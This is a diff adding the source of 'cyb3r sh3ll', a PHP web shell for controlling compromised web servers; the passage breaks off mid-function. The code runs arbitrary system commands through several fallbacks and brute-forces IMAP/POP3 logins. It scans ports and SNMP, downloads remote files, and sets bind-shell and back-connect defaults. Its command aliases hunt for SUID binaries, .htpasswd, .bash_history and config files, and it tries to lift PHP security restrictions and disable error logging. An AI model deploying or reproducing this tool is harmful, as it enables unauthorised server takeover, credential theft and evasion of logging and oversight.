+$tracebackFeature       = "off"; // set this feature to on to enable email alerts
+$log_email = "cyb3r.gladiat0r@gmail.com"; //Default e-mail for sending logs
+
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+error_reporting(5);
+$phpVersion = phpversion();
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+$shver = "1.0"; //Current version
+if (!function_exists("getmicrotime")) {
+ function getmicrotime() {
+  list($usec, $sec) = explode(" ", microtime()); 
+  return ((float)$usec + (float)$sec);
+  }
+ }
+
+define("starttime",getmicrotime());
+
+if (get_magic_quotes_gpc()) {
+ if (!function_exists("strips")) {
+  function strips(&$arr,$k="") {
+   if (is_array($arr)) {
+    foreach($arr as $k=>$v) {
+         if (strtoupper($k) != "GLOBALS") {
+          strips($arr["$k"]);
+          }
+         }
+         } else {
+        $arr = stripslashes($arr);
+        }
+        }
+        } 
+        strips($GLOBALS);
+}
+
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+if (!empty($unset_surl)) {setcookie("cyb3r_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("cyb3r_surl",$surl);}
+else {$surl = $_REQUEST["cyb3r_surl"]; //Set this cookie for manual SURL
+
+}
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+if ($surl_autofill_include and !$_REQUEST["cyb3r_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+
+if (empty($surl))
+{ $surl = "?".$includestr; }//Self url 
+$surl = htmlspecialchars($surl);
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+
+$welcome = "(: Welcome to the most advanced PHP Web Shell - cyb3r sh3ll :)";
+//DON'T FORGOT ABOUT PASSWORD!!!
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$gzipencode = False; //Encode with gzip?
+
+$ax4 ="http://"; 
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+
+$donated_html = "<center><b>Owned by cyb3r.gladiat0r</b></center>";
+$release = @php_uname('r'); 
+$kernel = @php_uname('s'); 
+$expltlink='http://www.exploit-db.com/search/?action=search&filter_exploit_text='; 
+if( strpos('Linux', $kernel) !== false ) 
+    $expltlink .= urlencode( 'Linux Kernel ' . substr($release,0,6) ); 
+else 
+    $expltlink .= urlencode( $kernel . ' ' . substr($release,0,3) );
+
+/* If you publish free shell and you wish add link to your site or any other information, put here your html. */
+
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+
+$curdir = "./"; //start folder
+
+//$curdir = getenv("DOCUMENT_ROOT");
+$curdir = getcwd();
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
+
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
+
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
+
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
+
+if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0;
+function imaplogiN($host,$username,$password){
+$sock=fsockopen($host,143,$n,$s,5);
+$b=namE();
+$l=strlen($b);
+if(!$sock)return -1;
+fread($sock,1024);
+fputs($sock,"$b LOGIN $username $password\r\n");
+$res=fgets($sock,$l+4);
+if ($res == "$b OK")return 1;else return 0;
+fclose($sock);
+}
+function pop3logiN($server,$user,$pass){
+$sock=fsockopen($server,110,$en,$es,5);
+if(!$sock)return -1;
+fread($sock,1024);
+fwrite($sock,"user $user\n");
+$r=fgets($sock);
+if($r{0}=='-')return 0;
+fwrite($sock,"pass $pass\n");
+$r=fgets($sock);
+fclose($sock);
+if($r{0}=='+')return 1;
+return 0;
+}
+function check_urL($url,$method,$search,$timeout){
+if(empty($search))$search='200';
+$u=parse_url($url);
+$method=strtoupper($method);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
+$data=(!empty($u['query']))?$u['query']:'';
+if(!empty($data))$data="?$data";
+$sock=@fsockopen($host,80,$en,$es,$timeout);
+if($sock){
+fputs($sock,"$method $file$data HTTP/1.0\r\n");
+fputs($sock,"Host: $host\r\n");
+if($method=='GET')fputs($sock,"\r\n");
+elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data");
+else return 0;
+if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;}
+while(!feof($sock)){
+$res=trim(fgets($sock));
+if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}
+}
+fclose($sock);
+}
+return 0;
+}
+function snmpchecK($ip,$com,$timeout){
+$res=0;
+$n=chr(0x00);
+$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). 
+$com. chr(0xA0). 
+chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n.
+chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C).
+chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01).
+chr(0x01). chr(0x01). $n. chr(0x05). $n;
+$sock=@fsockopen("udp://$ip",161);
+socket_set_timeout($sock,$timeout);
+@fputs($sock,$packet);
+socket_set_timeout($sock,$timeout);
+$res=fgets($sock);
+fclose($sock);
+return $res;
+}
+function checkthisporT($ip,$port,$timeout,$type=0){
+if(!$type){
+$scan=@fsockopen($ip,$port,$n,$s,$timeout);
+if($scan){fclose($scan);return 1;}
+}
+elseif(function_exists('socket_set_timeout')){
+$scan=@fsockopen("udp://".$ip,$port);
+if($scan){
+socket_set_timeout($scan,$timeout);
+@fwrite($scan,"\x00");
+$s=time();
+fread($scan,1);
+if((time()-$s)>=$timeout){fclose($scan);return 1;}
+}
+}
+return 0;
+}
+function get_sw_namE($host,$timeout){
+$sock=@fsockopen($host,80,$en,$es,$timeout);
+if($sock){
+$page=namE().namE();
+fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");
+while(!feof($sock)){
+$con=fgets($sock);
+if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}
+}
+fclose($sock);
+return -1;
+}return 0;
+}
+function getDisabledFunctions(){
+    if(!ini_get('disable_functions'))
+    {
+                echo "None";
+    }
+    else
+    {
+                        echo @ini_get('disable_functions');
+    }
+}
+function showsizE($size){
+if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
+elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
+elseif ($size>=1024)$size = round(($size/1024),2)." KB";
+else $size .= " B";
+return $size;
+}
+function whereistmP(){
+$uploadtmp=ini_get('upload_tmp_dir');
+$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
+if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
+if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
+if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
+if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
+if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
+return ".";
+}
+function downloadiT($get,$put){
+$fo=@strtolower(ini_get('allow_url_fopen'));
+if($fo || $fo=='on')$con=file_get_contents($get);
+else{
+$u=parse_url($get);
+$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
+$url=fsockopen($host, 80, $en, $es, 12);
+fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
+$tmp=$con='';
+while($tmp!="\r\n")$tmp=fgets($url);
+while(!feof($url))$con.=fgets($url);
+}
+$mk=file_put_contents($put,$con);
+if($mk)return 1;
+return 0;
+}
+function flusheR(){
+flush();@ob_flush();
+}
+function namE(){
+$name='';
+srand((double)microtime()*100000);
+for ($i=0;$i<=rand(3,10);$i++){
+$name.=chr(rand(97,122));
+}
+return $name;
+}
+function hlinK($str=""){
+$myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','sec','cP','mV','rN','deL');
+$ret=$_SERVER['PHP_SELF']."?";
+$new=explode("&",$str);
+foreach ($_GET as $key => $v){
+$add=1;
+foreach($new as $m){
+$el = explode("=", $m);
+if ($el[0]==$key)$add=0;
+}
+if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";
+}
+$ret.=$str;
+return $ret;
+}
+function shelL($command){
+global $windows,$disablefunctions;
+$exec = '';$output= '';
+$dep[]=array('pipe','r');$dep[]=array('pipe','w');
+if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
+elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
+elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
+elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
+elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
+elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
+elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
+return $exec;
+}
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext4","ext5","ext6",...),
+//   ...
+//  )
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+// Registered executable file-types.
+//  array(
+//   string "command{i}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+//   {command}: %f% = filename
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+/* Highlighted files.
+  array(
+   i=>array({regexp},{type},{opentag},{closetag},{break})
+   ...
+  )
+  string {regexp} - regular exp.
+  int {type}:
+0 - files and folders (as default),
+1 - files only, 2 - folders only
+ string {opentag} - open html-tag, e.g. "<b>" (default)
+  string {closetag} - close html-tag, e.g. "</b>" (default)
+  bool {break} - if TRUE and found match then break
+*/
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
+ // array (i=>{letter} ...); string {letter} - letter of a drive
+//$safemode_diskettes = range("a","z");
+$hexdump_lines = 8;// lines in hex preview file
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
+$cx7 =".com"; 
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+$bindport_pass = "cyb3r";  // default password for binding
+$bindport_port = "31373"; // default port for binding
+$bc_port = "31373"; // default port for back-connect
+$cx4 ="/x."; 
+$datapipe_localport = "8081"; // default port for datapipe
+// Command-aliases
+if (!$win)
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "ls -la"),
+  array("find all suid files", "find / -type f -perm -04000 -ls"),
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
+  array("find all sgid files", "find / -type f -perm -02000 -ls"),
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+  array("find config.inc.php files", "find / -type f -name config.inc.php"),
+  array("find config* files", "find / -type f -name \"config*\""),
+  array("find config* files in current dir", "find . -type f -name \"config*\""),
+  array("find all writable folders and files", "find / -perm -2 -ls"),
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
+  array("find all service.pwd files", "find / -type f -name service.pwd"),
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"),
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+  array("find all .bash_history files", "find / -type f -name .bash_history"),
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"),
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+  array("list file attributes on a Linux second extended file system", "lsattr -va"),
+  array("show opened ports", "netstat -an | grep -i listen")
+ );
+}
+else
+{
+ $cmdaliases = array(
+  array("-----------------------------------------------------------", "dir"),
+  array("show opened ports", "netstat -an")
+ );
+}
+$sess_cookie = "cyb3rvars"; // Cookie-variable name
+$usefsbuff = TRUE; //Buffer-function
+$px7 ="html";  
+$copy_unset = FALSE; //Remove copied files from buffer after pasting
+//Quick launch
+$quicklaunch = array(
+ array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl),
+ array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),
+ array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),
+ array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
+ array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""),
+ array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),
+ array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),
+ array("<b>Encoder</b>",$surl."act=encoder&d=%d"),
+ array("<b>Shell</b>",$surl."act=shells&d=%d"),
+ array("<b>Cracker</b>",$surl."act=cracker&d=%d"),
+ array("<b>Scanner</b>",$surl."act=scanner&d=%d"),
+ array("<b>Net Tools</b>",$surl."act=nettools&d=%d"),
+ array("<b>SQL</b>",$surl."act=sql&d=%d"),
+ array("<b>PHP-code</b>",$surl."act=phpcode&d=%d"),
+ array("<b>Mailer</b>",$surl."act=mailer&d=%d"),   //update this section copy from b3t4k shell hardeep
+ array("<b>DOS</b>",$surl."act=dos&d=%d"),   //update this section copy from b3t4k shell hardeep
+ array("<b>Local Domain</b>",$surl."act=localdomain&d=%d"), //update this section copy from b3t4k shell hardeep
+ array("<b>Upload</b>",$surl."act=upload&d=%d"),
+ array("<b>About</b>",$surl."act=about&d=%d"),   //update this section copy from b3t4k shell hardeep
+ );
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["cyb3rcook"]);
+//END CONFIGURATION
+// -------------- Traceback Functions
+function sendLoginAlert()
+{
+    global $ownerEmail;
+    global $url;
+        $ref=$_SERVER['HTTP_REFERER'];
+        $agent=$_SERVER['HTTP_USER_AGENT'];
+    $accesedIp = $_SERVER['REMOTE_ADDR'];
+    $randomInt = rand(0,1000000);           # to avoid id blocking
+    $from = "cyb3r-sh3ll$randomInt@cyb3r.gladiat0r.com"; 
+     //echo $from;
+     if(function_exists('mail'))
+    {
+        $subject = "Shell Accessed -- cyb3r-Sh3ll --";
+        $message = "
+Hey Owner ,
+        
+        Your Shell(cyb3r-Sh3ll) located at $url was accessed by $accesedIp this mail refered by $ref 
+                Your shell was accesed by $agent
+     
+        If its not you :-
+        
+        1. Please check if the shell is secured.
+        2. Change your user name and Password.
+        3. Check if lock is 0n!
+
+        Thanking You
+        
+Yours Faithfully
+cyb3r Sh3ll
+        ";
+        mail($ownerEmail,$subject,$message,'From:'.$from);
+    }
+}
+
+//---------------------------------------------------------
+if(function_exists('session_start') && $lock == 'on')
+{
+    session_start();
+}
+else
+{
+    // The lock will be set to 'off' if the session_start fuction is disabled i.e if sessions are not supported 
+    $lock = 'off';
+} 
+
+//logout
+if(isset($_GET['logout']) && $lock == 'on')
+{
+    $_SESSION['authenticated'] = 0;
+    session_destroy();
+    header("location: ".$_SERVER['PHP_SELF']);
+}
+
+/***************** Restoring *******************************/
+ini_restore("safe_mode_include_dir");
+ini_restore("safe_mode_exec_dir");
+ini_restore("disable_functions");
+ini_restore("allow_url_fopen");
+ini_restore("safe_mode");
+ini_restore("open_basedir");
+if(function_exists('ini_set'))
+{
+    ini_set('error_log',NULL);  // No alarming logs
+    ini_set('log_errors',0);    // No logging of errors
+    ini_set('file_uploads',1);  // Enable file uploads
+    ini_set('allow_url_fopen',1);   // allow url fopen 
+}
+
+else
+{
+    ini_alter('error_log',NULL);
+    ini_alter('log_errors',0);
+    ini_alter('file_uploads',1);
+    ini_alter('allow_url_fopen',1);
+}
+// ----------------------------------------------------------------------------------------------------------------
+// \/Next code isn't for editing\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"#\">cyb3r sh3ll</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+?>
+<html>
+<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us">
+<title>cyb3r sh3ll | India - <?php echo getenv("HTTP_HOST"); ?></title>
+<?php
+if($antiCrawler != 'off')
+{
+    ?>
+    <meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
+    <?php
+}
+?>
+<STYLE>
+TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #15354C; scrollbar-shadow-color: #15354C; scrollbar-highlight-color: #15354C; scrollbar-3dlight-color: #15354C scrollbar-darkshadow-color: #15354C; scrollbar-track-color: #050E14; scrollbar-arrow-color: #D9D9D9; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #2b3b46; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #050e14;}</style>
+</head>
+<BODY text=#ffffff bottomMargin=0 bgColor=#050e14 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
+<?php
+if(isset($_POST['user']) && isset($_POST['pass']) && $lock == 'on')
+{
+    if( $_POST['user'] == $user &&
+         $_POST['pass'] == $pass )
+    {
+            $_SESSION['authenticated'] = 1;
+            // --------------------- Tracebacks --------------------------------
+            if($tracebackFeature == 'On')
+            {
+                sendLoginAlert();
+            }
+            // ------------------------------------------------------------------
+    }
+}
+
+if($lock == 'off')
+{?>
+    <p><font color=red><b>Lock is Switched Off! , The shell can be accessed by anyone!</b></font></p>
+<?php
+}
+
+if($lock == 'on' && (!isset($_SESSION['authenticated']) || $_SESSION['authenticated']!=1) )
+{
+
+?>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark='#666666' cellPadding=5 width="100%" bgColor='#15354c' borderColorLight='#c0c0c0' border=1 bordercolor='#C0C0C0'>
+<tr><td valign='top'><center><font face="times, serif" size="3" color="white">Welcome to the most advanced PHP web Shell- <b><font color=orange>cyb</font>3r Sh<font color=green>3ll</font></b> :: By cyb3r gl4d!470r ...</font></center></td>
+</tr>
+</table>
+<br/>
+
+
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark='#666666' cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=0 bordercolor='#C0C0C0'>
+<tr>
+
+<td width="50%"><center><img src="http://s15.postimage.org/94kp4a0ej/indian_flag.png" /></center></td>
+<td><center><img src="http://s15.postimage.org/whiqmsgi3/gladiator.png" width="352px" height="500px"/></center></td>
+</tr>
+</table>
+<div style="position:absolute; border-style:solid;border-width:0px; top:280px;left:280px; right:430px; bottom:180px;" >
+<center><font face="times, serif" color="white">
+         <h1><?php echo $welcome; ?></h1><br /><br />
+      <form method="POST" action="">
+      <input name="user" value="Username"/> <input name="pass" type="password" value="Password"/> <input type="Submit" value="Own This Box!"/>
+      </form>
+          <font size="3">Coded by cyb3r 9ladiat0r for all hacking communities working for my motherland.......<br/><br/>
+          
+          Always there to serve my country, My India on any Terms...</font>
+          
+          </font>
+</center>
+</div>
+<br/>
+<?php
+}
+//---------------------------------- We are authenticated now-------------------------------------
+//Launch the shell
+else 
+{
+
+if ($act != "img")
+
+{
+
+$lastdir = realpath(".");
+
+chdir($curdir);
+
+if ($selfwrite or $updatenow) {@ob_clean(); cyb3r_getupdate($selfwrite,1); exit;}
+
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+
+if (!is_array($sess_data)) {$sess_data = array();}
+
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+
+
+$disablefunc = @ini_get("disable_functions");
+
+if (!empty($disablefunc))
+
+{
+
+ $disablefunc = str_replace(" ","",$disablefunc);
+
+ $disablefunc = explode(",",$disablefunc);
+
+}
+
+
+
+if (!function_exists("cyb3r_buff_prepare"))
+
+{
+
+function cyb3r_buff_prepare()
+
+{
+
+ global $sess_data;
+
+ global $act;
+
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+
+ sort($sess_data["copy"]);
+
+ sort($sess_data["cut"]);
+
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+
+}
+
+}
+
+cyb3r_buff_prepare();
+
+if (!function_exists("cyb3r_sess_put"))
+
+{
+
+function cyb3r_sess_put($data)
+
+{
+
+ global $sess_cookie;
+
+ global $sess_data;
+
+ cyb3r_buff_prepare();
+
+ $sess_data = $data;
+
+ $data = serialize($data);
+
+ setcookie($sess_cookie,$data);
+
+}
+
+}
+
+foreach (array("sort","sql_sort") as $v)
+
+{
+
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+
+}
+
+if ($sort_save)
+
+{
+
+ if (!empty($sort)) {setcookie("sort",$sort);}
+
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+
+}
+
+if (!function_exists("str2mini"))
+
+{
+
+function str2mini($content,$len)
+
+{
+
+ if (strlen($content) > $len)
+
+ {
+
+  $len = ceil($len/2) - 2;
+
+  return substr($content, 0,$len)."...".substr($content,-$len);
+
+ }
+
+ else {return $content;}
+
+}
+
+}
+
+if (!function_exists("view_size"))
+
+{
+
+function view_size($size)
+
+{
+
+ if (!is_numeric($size)) {return FALSE;}
+
+ else
+
+ {
+
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+
+  else {$size = $size . " B";}
+
+  return $size;
+
+ }
+
+}
+
+}
+
+if (!function_exists("fs_copy_dir"))
+
+{
+
+function fs_copy_dir($d,$t)
+
+{
+
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+
+ $h = opendir($d);
+
+ while (($o = readdir($h)) !== FALSE)
+
+ {
+
+  if (($o != ".") and ($o != ".."))
+
+  {
+
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+
+   if (!$ret) {return $ret;}
+
+  }
+
+ }
+
+ closedir($h);
+
+ return TRUE;
+
+}
+
+}
+
+if (!function_exists("fs_copy_obj"))
+
+{
+
+function fs_copy_obj($d,$t)
+
+{
+
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+
+ if (is_dir($d))
+
+ {
+
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+
+  return fs_copy_dir($d,$t);
+
+ }
+
+ elseif (is_file($d)) {return copy($d,$t);}
+
+ else {return FALSE;}
+
+}
+
+}
+
+if (!function_exists("fs_move_dir"))
+
+{
+
+function fs_move_dir($d,$t)
+
+{
+
+ $h = opendir($d);
+
+ if (!is_dir($t)) {mkdir($t);}
+
+ while (($o = readdir($h)) !== FALSE)
+
+ {
+
+  if (($o != ".") and ($o != ".."))
+
+  {
+
+   $ret = TRUE;
+
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+
+   if (!$ret) {return $ret;}
+
+  }
+
+ }
+
+ closedir($h);
+
+ return TRUE;
+
+}
+
+}
+
+if (!function_exists("fs_move_obj"))
+
+{
+
+function fs_move_obj($d,$t)
+
+{
+
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+
+ if (is_dir($d))
+
+ {
+
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+
